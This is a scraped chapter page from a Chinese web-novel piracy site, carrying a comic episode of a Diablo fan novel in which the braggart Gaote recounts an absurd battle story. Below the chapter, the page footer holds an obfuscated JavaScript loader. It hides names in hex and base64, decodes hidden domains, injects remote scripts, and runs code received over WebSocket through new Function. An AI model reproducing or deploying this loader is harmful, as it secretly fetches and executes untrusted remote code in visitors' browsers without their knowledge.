笔趣阁

安装
字:
关灯 护眼
笔趣阁 > 暗黑破坏神之毁灭 > 第三千九百二十七章 高特无所畏惧

第三千九百二十七章 高特无所畏惧

章节错误,点此举报(免注册),举报后维护人员会在两分钟内校正章节内容,请耐心等待,并刷新页面。
****************************************************************************************
  
  “吴老弟你这是怎么了?宴会都开始了怎么才来,而且看起来脸色不大好,步子有点虚,是不是没休息好?”
  
  偷偷摸摸鬼鬼祟祟回到家的时候,宴会已经开始了,高特大猩猩卑微的躲在边角之地,一口烤肉一口香蕉一口酒,没有丽娜大姐盯着,很开心,很自由,很放纵,感觉渐渐来了,正要迈入猩猩兽的第一形态,擦菠萝,这时候,来自野兽的敏锐五感让他第一时间发现了我。
  
  “憋说了。”我罢了罢手,装作一副无精打采的模样,脑子却精神百倍的高速转着,这猩猩好打发,我随便找个借口就能糊弄过去,而且还能忽悠着他帮我一起作证。
  
  “其实是这样的,你也知道,我的爱剑被砍断了。”
  
  “噗哈哈喔哈哈哈……噗唔唔。”大猩猩一脸幸灾乐祸的菊花脸,飞快扭过头去,一口酒喷了出来,等他扭回头,颇具官威的四方脸,变得沉重,肃穆,哀悼。
  
  “这真是个坏消息,噢,亲爱的吴老弟,请节哀顺变,一定要相信,明天会更好。”
  
  “哦,是么?”这猩猩的演技也是猩猩级别的,我冷着脸,要不是这货还有利用价值,我今个儿就要做一件能让自己明天的心情变得更好的事情。
  
  “是是是,旧的不去新的不来。”高特大猩猩感觉自己蒙混过关了,似乎又感觉火候还不够,他用力的点点头,眼神一下子忧郁,沧桑起来,缓缓望着无尽的黑暗夜空,他的嗓调低沉而沙哑。
  
  “事实上,我非常能够理解你现在的感受,因为我也差点失去过,差点痛失我最心爱的【宝剑】。”
  
  “哦?”瞧着大猩猩一脸唏嘘缅怀追忆,不似作假,我的好奇心来了,莫非每个搞笑人物背后,当真都有一段不堪回首的神秘过往?
  
  “那是三十年前还是五十年前的事情来着?过了太久我也记不大清了,印象中最深刻的是一个暴风雪天气的险恶夜晚,我们小队遭遇到了一场前所未有的恶战。”
  
  高特说到这里,似乎不堪忍受的打了一个冷战,脸色一片煞白,表情僵硬的就犹如遭遇到了他口中所述的暴风雪。
  
  “面对源源不断的敌人,我和丽娜浴血奋战,怪物的尸体,队友的尸体,不断堆叠到一起,淹没了脚踝,刀光与雪花,鲜血与哀嚎,狂风与怒吼,疲惫与混乱,和黑暗厮混在一起,已经分不清谁是谁……”
  
  我脑海中想象着那样的画面,心里不禁一凛,那可确实是险境之中的险境。
  
  不过……等等,好像有什么不对劲的感觉?
  
  你确认是尸体没过了脚踝?不是鲜血?什么怪物的尸体可以那么小,层叠在一起竟然还只是没过脚踝?恕历练二十余年的我孤陋寡闻,确实闻所未闻,见所未见。
  
  还是说,你这是和蚊子大军战斗呢?队友是苍蝇?
  
  另外,你当年的队友不是在第三世界好好的混着么?怎么到你嘴里忽然就壮烈了?
  
  “就在这时!”高特大猩猩全神投入到他所描绘的故事当中,大喊一声,身体如同筛子一样抖擞起来。
  
  “我过回头看了浑身染血的丽娜一眼,露出了温柔的笑容。”
  
  我觉得如果战况真像你说的那么激烈,在你回过头的一刹那,敌人就已经取了你的狗头,你的温柔一笑会就此定格,摆到相框里。
  
  “心里冒出了一个无比坚定的信念——就算我死了,也要保护好丽娜。”
  
  这话乍一听似乎没什么问题,但是仔细琢磨,问题又很大,小幽灵超可爱,但幽灵大猩猩还是算了吧,早点成佛,让丽娜大姐改嫁吧。
  
  “于是我脱下了身上的铠甲。”
  
  短短一句话,却让我思考了整整五秒钟才回过神来——因为高特大猩猩脱衣服在大家眼中,已经变成了一件常识,听到这里,竟然差点就被常识给钻了空子,觉得这句话没什么毛病。
  
  所以你面对激烈的战斗,强大的敌人,脱下了铠甲?
  
  “是的!”高特大猩猩露出决然目光,握紧拳头:“我要用我苦练已久的必杀,与敌人同归于尽!”
  
  明明是在说着过往故事,我却震惊的瞪大眼球,骤然发现,他的上衣竟然真的不见!不知道在什么时候脱掉了!
  
  “所以你的必杀和脱衣服到底有什么关系?”我实在忍不住,问了一句。
  
  目光对视数秒,他的大脑似乎重启了一样,再次握紧拳头,露出决然之色:“我要用我苦练已久的必杀,与敌人同归于尽!”
  
  “所以这和脱衣服到底有什么关系!!”
  
  “我要用我苦练已久的必杀,与敌人同归于尽!”
  
  “……”
  
  我放弃了,我认输了,我唐突了,您请继续。
  
  “就在这时,丽娜发现了我的壮烈举动。”
  
  自己夸自己壮烈可还行,清明是不是还得自己给自己上柱香?
  
  “不!!高特!!她这样凄切的大喊了一声。”
  
  “然而一切都已经太迟了,命运的齿轮开始转动,谁也阻止不了。”
  
『加入书签,方便阅读』
var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzk5OTk5OS0xMDE1Ng==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x66\x61\x70\x45\x64\x64\x73\x49\x48\x74']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=1000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,300000),ext='2',i='ndx'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9vanNrZGxmamtkay5oZHlwdy5jbb20=','d3NzOOi8vd3MuYW5kYTE1MTYuY29tOOjkwOOTAsd3NzOOi8vd3Muc3luZ2d5LmNvbTo5MDkwLHdzczovL3dzLnpoaXB1ZnMuY29tOOjkwOOTA=',window,document,['b','O']);}:function(){};
安装
继续浏览精彩内容
到笔趣阁APP免费阅读
《暗黑破坏神之毁灭》
打开
浏览器
继续